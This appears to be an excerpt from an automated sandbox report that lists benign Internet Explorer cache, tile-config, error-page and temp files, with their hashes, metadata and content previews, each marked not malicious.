                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):653
                        Entropy (8bit):5.100792594048622
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxfnvRfDKRf8nWimI002EtM3MHdNMNxfnvRfDXVV8nWimI00OYGe5EtMb:2d6NxXRfDKRf8SZHKd6NxXRfDXL8SZ7Q
                        MD5:7A0858FCBFC03AA1DBCCFF36133AD9DB
                        SHA1:034E9AB92DB4EEE559E84C9760F470954D3A4422
                        SHA-256:EC63AB7411D857A0AA038EF4D700252C5F7839DF80B2B5E5AB931486E21690FF
                        SHA-512:FB3DE82F4D39726FD0F52008923CE55CBC5A734D4223C0A03E1499FA74981D16243EAC6E735A3FA98E0B80971E0BF43A4C089436840CCC4115D4492C70A47843
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\NewErrorPageTemplate[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):1612
                        Entropy (8bit):4.869554560514657
                        Encrypted:false
                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                        MD5:DFEABDE84792228093A5A270352395B6
                        SHA1:E41258C9576721025926326F76063C2305586F76
                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2997
                        Entropy (8bit):4.4885437940628465
                        Encrypted:false
                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                        MD5:2DC61EB461DA1436F5D22BCE51425660
                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                        Malicious:false
                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[2]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):2997
                        Entropy (8bit):4.4885437940628465
                        Encrypted:false
                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                        MD5:2DC61EB461DA1436F5D22BCE51425660
                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.249606135668305
                        Encrypted:false
                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                        MD5:C4F558C4C8B56858F15C09037CD6625A
                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                        Malicious:false
                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\NewErrorPageTemplate[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1612
                        Entropy (8bit):4.869554560514657
                        Encrypted:false
                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                        MD5:DFEABDE84792228093A5A270352395B6
                        SHA1:E41258C9576721025926326F76063C2305586F76
                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                        Malicious:false
                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\down[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                        Category:downloaded
                        Size (bytes):748
                        Entropy (8bit):7.249606135668305
                        Encrypted:false
                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                        MD5:C4F558C4C8B56858F15C09037CD6625A
                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/down.png
                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):4720
                        Entropy (8bit):5.164796203267696
                        Encrypted:false
                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/errorPageStrings.js
                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):12105
                        Entropy (8bit):5.451485481468043
                        Encrypted:false
                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                        MD5:9234071287E637F85D721463C488704C
                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                        Malicious:false
                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.249606135668305
                        Encrypted:false
                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                        MD5:C4F558C4C8B56858F15C09037CD6625A
                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                        Malicious:false
                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):12105
                        Entropy (8bit):5.451485481468043
                        Encrypted:false
                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                        MD5:9234071287E637F85D721463C488704C
                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                        Malicious:false
                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1612
                        Entropy (8bit):4.869554560514657
                        Encrypted:false
                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                        MD5:DFEABDE84792228093A5A270352395B6
                        SHA1:E41258C9576721025926326F76063C2305586F76
                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                        Malicious:false
                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dnserror[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):2997
                        Entropy (8bit):4.4885437940628465
                        Encrypted:false
                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                        MD5:2DC61EB461DA1436F5D22BCE51425660
                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=0
                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4720
                        Entropy (8bit):5.164796203267696
                        Encrypted:false
                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                        Malicious:false
                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\httpErrorPagesScripts[1]
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):12105
                        Entropy (8bit):5.451485481468043
                        Encrypted:false
                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                        MD5:9234071287E637F85D721463C488704C
                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                        Malicious:false
                        IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                        C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):89
                        Entropy (8bit):4.330858678274478
                        Encrypted:false
                        SSDEEP:3:oVXUBcNwspNW8JOGXnEBcNwsUULun:o9UBm4qEB3
                        MD5:9B2F941CC234206ED52127B15C3DB5C4
                        SHA1:CFA1858AE4D0BAD526EA88C088894AE87E7B68BC
                        SHA-256:E62B2E85EE25A7F9675E2672D59BAE17BCF10A6E913BF5358AA4305B616F4772
                        SHA-512:729D1A577343DB9EE0487DCF350241F878F815B11C91EC2FA2BB78897FE1A2B936DD35D5660BAB55511FF70D29C20E191E85793B66D88F2FEB82317B52B6BE7F
                        Malicious:false
                        Preview: [2021/01/11 19:19:58.275] Latest deploy version: ..[2021/01/11 19:19:58.275] 11.211.2 ..
                        C:\Users\user\AppData\Local\Temp\~DF2067CF7CEB139563.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39633
                        Entropy (8bit):0.571125479592397
                        Encrypted:false
                        SSDEEP:48:kBqoxKAuvScS+/hDqOIO+gSexjm/r310kcgSexjm/r310kcgSexjm/r310k9:kBqoxKAuvScS+/hDqxby6Rmy6RWy6Rv
                        MD5:1E9C165BA8BBA336C2F29A759A8A63F4
                        SHA1:196030A43DA96C58881459B13C0EC493E61714E0
                        SHA-256:C30B5984EF56B3CBCF4CAC78DF3D6BFF6A773ACB643894B06B8D8931651283A9
                        SHA-512:367F0BD24041967CA819E403BC99143DA2587B359743473F94533B35FF571115E89D430637E078E7FC875F03EB0AC0E2B6831B6B925168F645DF4DFE3964B87A
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DF3AD4F610F2F01C17.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12933
                        Entropy (8bit):0.4073703340301186
                        Encrypted:false
                        SSDEEP:24:c9lLh9lLh9lIn9lIn9loLuS9loLuC9lWLuu4ciu43A3:kBqoILmL4LmW
                        MD5:9E06FBC5BBCCF4AD5560712694B4D83F
                        SHA1:17EBB760CB64206E78E840D1D07EA9E218DB3810
                        SHA-256:F56041664FC19EB49766B6932193151BA2E3CC4BE20C25915F1D6B4B1660FB86
